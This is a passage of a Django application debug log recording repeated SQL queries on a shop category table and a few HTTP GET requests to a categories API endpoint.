"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:15:56,672 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:15:56,676 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:15:56,680 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:15:56,685 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:15:56,691 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:15:56,695 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:15:56,699 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:15:56,703 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:15:56,707 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:15:56,713 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:15:56,717 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:15:56,721 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:15:56,725 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:15:56,729 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:15:56,736 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:15:56,740 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:15:56,744 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:15:56,748 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:15:56,750 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:15:56,753 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:15:56,756 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:15:56,758 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:15:56,761 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:15:56,764 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:15:56,767 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:15:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:16:39] "GET / HTTP/1.0" 302 0 [13/Dec/2019 14:21:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 14:22:25,700 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:22:25,713 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:22:25,721 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:22:25,727 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:22:25,733 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:22:25,737 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:22:25,740 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:22:25,744 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:22:25,748 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:22:25,755 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:22:25,758 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:22:25,762 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:22:25,767 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:22:25,771 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:22:25,777 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:22:25,781 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:22:25,785 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:22:25,789 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:22:25,793 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:22:25,799 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:22:25,803 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:22:25,807 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:22:25,812 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:22:25,817 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:22:25,821 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:22:25,827 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:22:25,831 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:22:25,836 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:22:25,840 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:22:25,844 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:22:25,852 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:22:25,856 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:22:25,860 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:22:25,865 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:22:25,869 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:22:25,876 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:22:25,880 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:22:25,884 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:22:25,888 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:22:25,892 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:22:25,897 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:22:25,902 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 